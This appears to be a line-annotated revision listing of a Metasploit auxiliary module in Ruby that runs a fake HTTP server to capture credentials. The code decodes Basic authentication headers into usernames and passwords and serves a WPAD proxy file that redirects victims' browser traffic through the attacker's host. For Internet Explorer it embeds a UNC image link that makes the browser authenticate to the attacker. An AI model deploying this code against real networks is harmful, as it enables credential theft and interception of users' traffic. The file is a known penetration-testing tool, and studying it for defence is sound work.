2008-03-02 08:03:27 +00:00
|
|
|
##
|
2008-04-21 05:27:06 +00:00
|
|
|
# $Id$
|
2008-03-02 08:03:27 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/projects/Framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
|
|
|
|
class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Exploit::Remote::TcpServer
|
|
|
|
include Auxiliary::Report
|
|
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'Authentication Capture: HTTP',
|
2008-04-21 05:27:06 +00:00
|
|
|
'Version' => '$Revision$',
|
2008-03-02 08:03:27 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module provides a fake HTTP service that
|
|
|
|
is designed to capture authentication credentials.
|
|
|
|
},
|
|
|
|
'Author' => ['ddz', 'hdm'],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
[ 'Capture' ]
|
|
|
|
],
|
|
|
|
'PassiveActions' =>
|
|
|
|
[
|
|
|
|
'Capture'
|
|
|
|
],
|
|
|
|
'DefaultAction' => 'Capture'
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
2008-03-26 22:00:23 +00:00
|
|
|
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
|
|
|
|
OptPath.new('BGIMAGE', [ false, "The background image to use for the default web page", nil ])
|
2008-03-02 08:03:27 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def setup
|
|
|
|
super
|
|
|
|
@state = {}
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2008-03-26 22:00:23 +00:00
|
|
|
@bgimage = datastore['BGIMAGE']
|
|
|
|
@myhost = datastore['SRVHOST']
|
|
|
|
@myport = datastore['SRVPORT']
|
2008-03-02 08:03:27 +00:00
|
|
|
exploit()
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_client_connect(c)
|
|
|
|
@state[c.peerhost] ||= {
|
|
|
|
:ip => c.peerhost,
|
|
|
|
:sites => {}
|
|
|
|
}
|
|
|
|
c.extend(Rex::Proto::Http::ServerClient)
|
|
|
|
c.init_cli(self)
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_client_data(cli)
|
|
|
|
begin
|
2008-04-18 01:33:09 +00:00
|
|
|
data = cli.get_once(-1, 5)
|
|
|
|
case cli.request.parse(data)
|
|
|
|
|
2008-03-02 08:03:27 +00:00
|
|
|
when Rex::Proto::Http::Packet::ParseCode::Completed
|
|
|
|
dispatch_request(cli, cli.request)
|
|
|
|
|
|
|
|
cli.reset_cli
|
2008-03-22 05:40:34 +00:00
|
|
|
when Rex::Proto::Http::Packet::ParseCode::Error
|
2008-03-02 08:03:27 +00:00
|
|
|
close_client(cli)
|
|
|
|
end
|
2008-04-18 01:33:09 +00:00
|
|
|
rescue ::EOFError, ::Errno::EACCES, ::Errno::ECONNABORTED, ::Errno::ECONNRESET
|
|
|
|
rescue ::Exception
|
|
|
|
print_status("Error: #{$!.class} #{$!} #{$!.backtrace}")
|
2008-03-02 08:03:27 +00:00
|
|
|
end
|
2008-04-18 01:33:09 +00:00
|
|
|
|
|
|
|
close_client(cli)
|
2008-03-02 08:03:27 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def close_client(cli)
|
2008-04-18 01:33:09 +00:00
|
|
|
cli.close
|
2008-03-02 08:03:27 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def dispatch_request(cli, req)
|
2008-03-22 06:34:52 +00:00
|
|
|
|
2008-04-18 01:33:09 +00:00
|
|
|
os_name = nil
|
|
|
|
os_type = nil
|
|
|
|
os_vers = nil
|
|
|
|
os_arch = 'x86'
|
|
|
|
|
|
|
|
ua_name = nil
|
|
|
|
ua_vers = nil
|
|
|
|
|
|
|
|
ua = req['User-Agent']
|
|
|
|
|
|
|
|
case (ua)
|
|
|
|
when /rv:([\d\.]+)/
|
|
|
|
ua_name = 'FF'
|
|
|
|
ua_vers = $1
|
|
|
|
when /Mozilla\/[0-9]\.[0-9] \(compatible; MSIE ([0-9]\.[0-9]+)/:
|
|
|
|
ua_name = 'IE'
|
|
|
|
ua_vers = $1
|
|
|
|
when /Version\/(\d+\.\d+\.\d+).*Safari/
|
|
|
|
ua_name = 'Safari'
|
|
|
|
ua_vers = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
case (ua)
|
|
|
|
when /Windows/
|
|
|
|
os_name = 'Windows'
|
|
|
|
when /Linux/
|
|
|
|
os_name = 'Linux'
|
|
|
|
when /iPhone/
|
|
|
|
os_name = 'iPhone'
|
|
|
|
os_arch = 'armle'
|
|
|
|
when /Mac OS X/
|
|
|
|
os = 'Mac'
|
|
|
|
end
|
|
|
|
|
|
|
|
case (ua)
|
|
|
|
when /PPC/
|
|
|
|
os_arch = 'ppc'
|
|
|
|
end
|
|
|
|
|
|
|
|
os_name ||= 'Unknown'
|
|
|
|
|
2008-03-22 06:34:52 +00:00
|
|
|
mysrc = Rex::Socket.source_address(cli.peerhost)
|
|
|
|
hhead = (req['Host'] || @myhost).split(':', 2)[0]
|
|
|
|
|
2008-03-02 08:03:27 +00:00
|
|
|
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
|
|
|
|
basic,auth = req['Authorization'].split(/\s+/)
|
|
|
|
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
|
|
|
|
report_auth_info(
|
|
|
|
:host => cli.peerhost,
|
|
|
|
:proto => 'http',
|
2008-03-22 06:34:52 +00:00
|
|
|
:targ_host => hhead,
|
|
|
|
:targ_port => @myport,
|
2008-03-02 08:03:27 +00:00
|
|
|
:user => user,
|
|
|
|
:pass => pass,
|
|
|
|
:extra => req.resource.to_s
|
|
|
|
)
|
2008-03-22 06:34:52 +00:00
|
|
|
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
|
2008-03-02 08:03:27 +00:00
|
|
|
end
|
|
|
|
|
2008-04-18 01:33:09 +00:00
|
|
|
|
|
|
|
if(req.resource =~ /\.eml$/)
|
|
|
|
eml = "To: User\r\nFrom: Support\r\nSubject: Failed to connect\r\n\r\nInternet access has been prohibited by the administrator\r\n"
|
|
|
|
res =
|
|
|
|
"HTTP/1.1 200 OK\r\n" +
|
|
|
|
"Host: #{hhead}\r\n" +
|
|
|
|
"Content-Type: message/rfc822\r\n" +
|
|
|
|
"Content-Length: #{eml.length}\r\n" +
|
|
|
|
"Connection: Close\r\n\r\n#{eml}"
|
|
|
|
print_status("HTTP EML sent to #{cli.peerhost}")
|
|
|
|
cli.put(res)
|
|
|
|
return
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2008-03-02 08:03:27 +00:00
|
|
|
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
|
2008-03-22 06:34:52 +00:00
|
|
|
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
|
2008-03-02 08:03:27 +00:00
|
|
|
res =
|
|
|
|
"HTTP/1.1 200 OK\r\n" +
|
2008-03-22 06:34:52 +00:00
|
|
|
"Host: #{hhead}\r\n" +
|
2008-03-02 08:03:27 +00:00
|
|
|
"Content-Type: application/x-ns-proxy-autoconfig\r\n" +
|
|
|
|
"Content-Length: #{prx.length}\r\n" +
|
|
|
|
"Connection: Close\r\n\r\n#{prx}"
|
|
|
|
print_status("HTTP wpad.dat sent to #{cli.peerhost}")
|
|
|
|
cli.put(res)
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2008-04-18 01:33:09 +00:00
|
|
|
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource} #{os_name} #{ua_name} #{ua_vers}")
|
2008-03-02 08:03:27 +00:00
|
|
|
|
2008-03-22 07:13:47 +00:00
|
|
|
|
|
|
|
# The google maps / stocks view on the iPhone
|
|
|
|
if (req['Host'] == 'iphone-wu.apple.com')
|
|
|
|
case req.resource
|
|
|
|
when '/glm/mmap'
|
|
|
|
print_status("HTTP #{cli.peerhost} is using Google Maps on the iPhone")
|
|
|
|
when '/dgw'
|
|
|
|
print_status("HTTP #{cli.peerhost} is using Stocks/Weather on the iPhone")
|
|
|
|
else
|
|
|
|
print_status("HTTP #{cli.peerhost} is request #{req.resource} via the iPhone")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# The itunes store on the iPhone
|
|
|
|
if(req['Host'] == 'phobos.apple.com')
|
|
|
|
print_status("HTTP #{cli.peerhost} is using iTunes Store on the iPhone")
|
|
|
|
# GET /bag.xml
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-04-18 01:33:09 +00:00
|
|
|
# Background image
|
2008-03-26 22:00:23 +00:00
|
|
|
body_extra = ""
|
|
|
|
if(@bgimage)
|
|
|
|
img_ext = @bgimage.split(".")[-1].downcase
|
|
|
|
req_ext = req.resource.split(".")[-1]
|
|
|
|
ctypes =
|
|
|
|
{
|
|
|
|
"jpg" => "image/jpeg",
|
|
|
|
"jpeg" => "image/jpeg",
|
|
|
|
"png" => "image/png",
|
|
|
|
"gif" => "image/gif",
|
|
|
|
}
|
|
|
|
|
|
|
|
begin
|
|
|
|
if (img_ext == req_ext.downcase)
|
|
|
|
|
|
|
|
ctype = ctypes[img_ext] || ctypes["jpg"]
|
|
|
|
idata = ""
|
|
|
|
isize = File.size(@bgimage)
|
|
|
|
|
|
|
|
fd = File.open(@bgimage)
|
|
|
|
idata = fd.sysread(isize)
|
|
|
|
fd.close
|
|
|
|
|
|
|
|
res =
|
|
|
|
"HTTP/1.1 200 OK\r\n" +
|
|
|
|
"Host: #{mysrc}\r\n" +
|
|
|
|
"Content-Type: #{ctype}\r\n" +
|
|
|
|
"Content-Length: #{idata.length}\r\n" +
|
|
|
|
"Connection: Close\r\n\r\n#{idata}"
|
|
|
|
|
2008-03-26 22:05:40 +00:00
|
|
|
cli.put(res)
|
2008-03-26 22:00:23 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
rescue ::Exception
|
|
|
|
end
|
|
|
|
|
|
|
|
body_extra = "<img src='/background.#{img_ext}' width='100%' height='100%'>"
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2008-04-18 01:33:09 +00:00
|
|
|
data = "<html><head><title>Connecting...</title></head><body>#{body_extra}"
|
|
|
|
if(ua_name == "IE")
|
|
|
|
data << "<img src='\\\\#{mysrc}\\public#{Time.now.to_i.to_s}\\loading.jpg' width='1' height='1'>"
|
|
|
|
end
|
|
|
|
|
|
|
|
data << "</body></html>"
|
2008-03-26 22:00:23 +00:00
|
|
|
|
2008-03-02 08:03:27 +00:00
|
|
|
res =
|
|
|
|
"HTTP/1.1 200 OK\r\n" +
|
2008-03-26 22:00:23 +00:00
|
|
|
"Host: #{mysrc}\r\n" +
|
2008-04-18 01:33:09 +00:00
|
|
|
"Expires: 0\r\n" +
|
|
|
|
"Cache-Control: must-revalidate\r\n" +
|
2008-03-02 08:03:27 +00:00
|
|
|
"Content-Type: text/html\r\n" +
|
|
|
|
"Content-Length: #{data.length}\r\n" +
|
|
|
|
"Connection: Close\r\n\r\n#{data}"
|
|
|
|
|
|
|
|
cli.put(res)
|
|
|
|
return
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
end
|